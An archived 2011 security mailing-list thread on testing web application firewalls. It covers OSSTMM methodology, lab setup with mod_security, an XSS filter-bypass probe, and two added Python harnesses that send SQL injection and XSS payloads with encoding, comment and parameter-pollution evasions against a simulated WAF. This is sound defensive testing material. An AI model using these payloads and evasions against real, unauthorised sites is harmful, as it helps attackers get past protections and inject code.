On Sat, Oct 8, 2011 at 10:05 PM, Simone Onofri simone.onofri@gmail.com wrote:
Hi Hao,
IMHO, as for methodology you can use the OSSTMM [1], which has modules
such as Active Detection Verification, tasks for it and a tool [2] (this
is used prior to testing because a filtering device can corrupt the test
results, but I think it's a good start). Please correct me if I'm wrong
with this mapping.
Consider the WAF as an Authentication Control (via whitelist) and
also Alarm (if it has these functions) and Non-Repudiation (if it
maintains logs and/or sends data to a SIM/SIEM or other Log Management
system). It may be a good idea to check these too, for a complete
test, not only checking for bypasses.
So how to run the tasks depends on the vector, the test type and your
reason for testing, even if the OSSTMM says "It may be necessary to coordinate
these tests with the appropriate persons within the scope.".
If you have access to Web Application Firewall/web server logs you can
check which requests passed or not; otherwise, if you have no access to
logs, you may "tune" the script in order to recognize whether a request is
blocked or not (for example, dropped packets, specific or generic HTTP
errors, WSOD... it depends on the WAF used). Testing in a "lab" (attacker ->
WAF -> test web server) is best.
Depending on the WAF type and the techniques used (regular expressions and so
on...) it's also possible to use a custom script in order to:
- crawl the application, looking for pages and parameters
- tune the script
- send sample attacks, looking for reactions
- you may also elaborate attacks with evasion techniques (there are a
lot of papers... from packet fragmentation to encoding)
Another interesting test, inspired by this thread [3], is HTTP
Parameter Pollution [4].
Now you have "raw" output with requests that passed and requests that did not.
This output can be analyzed (by parameter, attack type and/or evasion technique)
in order to draw some conclusions about how and when the WAF works.
Note that depending on the WAF type you may find filtering at layer 7,
also with custom rules for each parameter, or at a lower layer, with
different characteristics. Also note that a WAF can be configured to
proactively block the attacker, compromising your test (reactions
must be deactivated for the test).
Cheers,
Simone
[1] http://www.isecom.org/osstmm/
[2] http://www.purehacking.com/news/afd-technical-details
[3] http://seclists.org/pen-test/2010/Sep/3
[4] https://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf
On Sat, Oct 8, 2011 at 10:43 AM, Hao Wang (haowa2) haowa2@cisco.com wrote:
Hi All,
Do you know some material about how to test a WAF and write a testing report? I wish there are some examples, could you help?
Regards,
-Hao
The Web Security Mailing List
WebSecurity RSS Feed
http://www.webappsec.org/rss/websecurity.rss
Join WASC on LinkedIn http://www.linkedin.com/e/gis/83336/4B20E4374DBA
WASC on Twitter
http://twitter.com/wascupdates
websecurity@lists.webappsec.org
http://lists.webappsec.org/mailman/listinfo/websecurity_lists.webappsec.org
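The script-based procedure Simone outlines (send sample attacks with evasion variants, recognise from the response whether each was blocked, then analyse the raw output by attack type and technique), as an added example that is not part of the thread. Everything in it is an assumption for illustration: the parameter name "q", the two sample attacks, the chosen evasion techniques (URL encoding, double encoding, case swapping, SQL inline comments and HTTP Parameter Pollution), and SimulatedWaf, an offline stand-in for attacker -> WAF -> test web server so the script runs without a lab. For a real run, replace SimulatedWaf.send with an HTTP client pointed at the lab target and tune classify() to the WAF's actual reactions.

```python
"""WAF probe harness (added example, not from the thread). All targets,
payloads, techniques and SimulatedWaf are illustrative assumptions."""
import re
import urllib.parse
from collections import defaultdict

# Sample attacks (constructed for this example), keyed by attack type.
ATTACKS = {
    "sqli": "' UNION SELECT username, password FROM users--",
    "xss": "<script>alert(1)</script>",
}

# Evasion techniques: each maps a payload to the list of values sent for one parameter.
def plain(p):
    return [p]

def url_encode(p):
    return [urllib.parse.quote(p, safe="")]

def double_encode(p):
    # beats filters that URL-decode the value only once before matching
    return [urllib.parse.quote(urllib.parse.quote(p, safe=""), safe="")]

def case_swap(p):
    return ["".join(c.upper() if i % 2 else c.lower() for i, c in enumerate(p))]

def inline_comment(p):
    # replaces whitespace with /**/ so "keyword<space>keyword" patterns miss
    return [re.sub(r"\s+", "/**/", p)]

def hpp(p):
    # HTTP Parameter Pollution: split the payload across two copies of the same
    # parameter, wrapped in /* */ so the comma an ASP.NET-style backend inserts
    # when concatenating duplicates lands inside a comment. Cut at the second
    # whitespace so keyword pairs such as UNION SELECT end up in different values.
    spaces = [m.start() for m in re.finditer(r"\s", p)]
    cut = spaces[1] if len(spaces) > 1 else len(p) // 2
    return [p[:cut] + "/*", "*/" + p[cut:].lstrip()]

TECHNIQUES = {
    "plain": plain, "url_encode": url_encode, "double_encode": double_encode,
    "case_swap": case_swap, "inline_comment": inline_comment, "hpp": hpp,
}

class SimulatedWaf:
    """Offline stand-in (assumed behaviour, not any real product): URL-decodes
    each parameter value once, lowercases it and runs two regex rules on each
    value separately; anything else reaches a backend that joins duplicate
    parameters with a comma."""
    RULES = [re.compile(r"union\s+select"), re.compile(r"<script")]

    def send(self, params):
        for values in params.values():
            for v in values:
                if any(r.search(urllib.parse.unquote(v).lower()) for r in self.RULES):
                    return 403, "Forbidden"
        joined = {k: ",".join(urllib.parse.unquote(v) for v in vs) for k, vs in params.items()}
        return 200, "echo: %r" % joined

def classify(status, body):
    """Verdict from what came back: nothing at all (dropped), an HTTP error,
    an empty page (WSOD) or passed. Tune per WAF."""
    if status is None:
        return "dropped"
    if status in (403, 406, 501):
        return "blocked"
    if status == 200:
        return "passed" if body.strip() else "wsod"
    return "http_%d" % status

def run(transport, attacks=ATTACKS, techniques=TECHNIQUES, param="q"):
    """Send every attack under every technique; return {(attack, technique): verdict}."""
    results = {}
    for atype, payload in attacks.items():
        for tname, tech in techniques.items():
            try:
                status, body = transport.send({param: tech(payload)})
            except ConnectionError:  # e.g. the WAF reset the connection
                status, body = None, ""
            results[(atype, tname)] = classify(status, body)
    return results

def summarize(results):
    """Verdict counts per attack type and per technique: the raw output to
    reason from when writing up where the WAF works and where it does not."""
    by_type = defaultdict(lambda: defaultdict(int))
    by_tech = defaultdict(lambda: defaultdict(int))
    for (atype, tname), verdict in results.items():
        by_type[atype][verdict] += 1
        by_tech[tname][verdict] += 1
    return ({k: dict(v) for k, v in by_type.items()},
            {k: dict(v) for k, v in by_tech.items()})

if __name__ == "__main__":
    res = run(SimulatedWaf())
    for (atype, tname), verdict in sorted(res.items()):
        print("%-5s %-15s %s" % (atype, tname, verdict))
    print(summarize(res))
```

Against the simulated rules, plain, URL-encoded and case-swapped payloads are blocked, while double encoding, inline comments and the HPP split get through; the per-technique table is what tells you whether a miss is a normalisation gap (decoding, whitespace handling) or a per-value inspection gap (duplicate parameters), which is the distinction a report should make.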
I would say that a real world way to test a WAF is to test a web
application first. Then, put the Web Application Firewall in front of
it, then test again. This time, if you can't find any of the
vulnerabilities that you found before then the WAF is probably doing
an ok job.
Take into consideration that most WAFs will block out of the box
scanning, but will fail on simple variations of injections.
Here is a good inject for XSS against WAFs:
<input oninput%3d"">
I personally don't trust most WAFs to block more than just automated
scanning, and they aren't a cure for vulnerabilities in your site's code.
@superevr
On Oct 8, 2011, at 10:47 AM, "Hao Wang (haowa2)" haowa2@cisco.com wrote:
Hi All,
Do you know some material about how to test a WAF and write a testing report? I wish there are some examples, could you help?
Regards,
-Hao
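What makes super evr's payload a "simple variation" that pattern-based filters miss, as an added example that is not part of the thread. The two rules below are assumptions for illustration, not any real WAF's rule set: RULE_A is a blacklist of well-known event handler names matched against the raw request, RULE_B is a generic on*= pattern. The payload carries no "=" (it is sent as %3d) and uses oninput, which older handler blacklists do not list, so RULE_A never fires and RULE_B only fires if the filter URL-decodes before matching. The HTMLParser step shows what the browser sees once the web server has decoded the value: an input element with an oninput attribute (empty here, so the payload is a probe for whether the attribute gets through rather than a working exploit). The constructed CLASSIC payload is there for contrast.

```python
"""Why <input oninput%3d""> slips past naive rules (added example; RULE_A and
RULE_B are illustrative assumptions, not a real product's rules)."""
import re
import urllib.parse
from html.parser import HTMLParser

PAYLOAD = '<input oninput%3d"">'            # from super evr's post
CLASSIC = '<img src=x onerror=alert(1)>'     # constructed: what blacklists were written for

# Rule A (assumed): fixed list of handler names, applied to the raw request.
RULE_A = re.compile(r'\bon(load|error|click|mouseover|focus)\s*=', re.I)
# Rule B (assumed): any on* attribute followed by "=".
RULE_B = re.compile(r'\bon[a-z]+\s*=', re.I)

def rule_a_blocks(raw):
    return bool(RULE_A.search(raw))

def rule_b_blocks_raw(raw):
    # same pattern without decoding first: "%3d" is not "="
    return bool(RULE_B.search(raw))

def rule_b_blocks_decoded(raw):
    # normalise the way the web server will before matching
    return bool(RULE_B.search(urllib.parse.unquote(raw)))

class AttrCollector(HTMLParser):
    """Records (tag, [attribute names]) as a browser would parse the reflected value."""
    def __init__(self):
        super().__init__()
        self.seen = []

    def handle_starttag(self, tag, attrs):
        self.seen.append((tag, [name for name, _ in attrs]))

def as_browser_sees(raw):
    parser = AttrCollector()
    parser.feed(urllib.parse.unquote(raw))
    return parser.seen

def evaluate(raw):
    """Verdict of each rule plus what reaches the browser after server-side decoding."""
    return {
        "rule_a": rule_a_blocks(raw),
        "rule_b_raw": rule_b_blocks_raw(raw),
        "rule_b_decoded": rule_b_blocks_decoded(raw),
        "browser": as_browser_sees(raw),
    }

if __name__ == "__main__":
    for name, raw in (("PAYLOAD", PAYLOAD), ("CLASSIC", CLASSIC)):
        print(name, evaluate(raw))
```

The two failure modes are independent: a filter that decodes but keeps a fixed handler list still misses oninput, and a filter with a generic pattern that does not decode still misses %3d. Both are cheap to add to the variant list of a probe script.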
Hi all,
I did a presentation at AppSec USA Washington 2010 about Open Source
WAF. I was then turning a standard Apache Server into a Reverse-Proxy
and then into a WAF. Everything was/is prepared for the participants on
a LiveCD. Everything is available as a video tutorial.
Videos showing all steps (From Apache to WAF with mod_security)
https://www.hacking-lab.com/news/newspage/open-source-entry-server.html
For your question on how to proceed:
a) download and install vulnerable web app
b) setup WAF
c) Configure your WAF for a)
Enjoy!
Some more Videos based on the same technique:
PART 1: Howto Create WAF in front of Facebook
http://media.hacking-lab.com/movies/rp2/
PART 2: Howto Create WAF in front of Facebook
http://media.hacking-lab.com/movies/rp2.2/
Regards
Ivan
-----Original Message-----
From: websecurity-bounces@lists.webappsec.org
[mailto:websecurity-bounces@lists.webappsec.org] On Behalf Of super evr
Sent: Sunday, 9 October 2011 02:58
To: Hao Wang (haowa2)
Cc: websecurity@webappsec.org
Subject: Re: [WEB SECURITY] WAF testing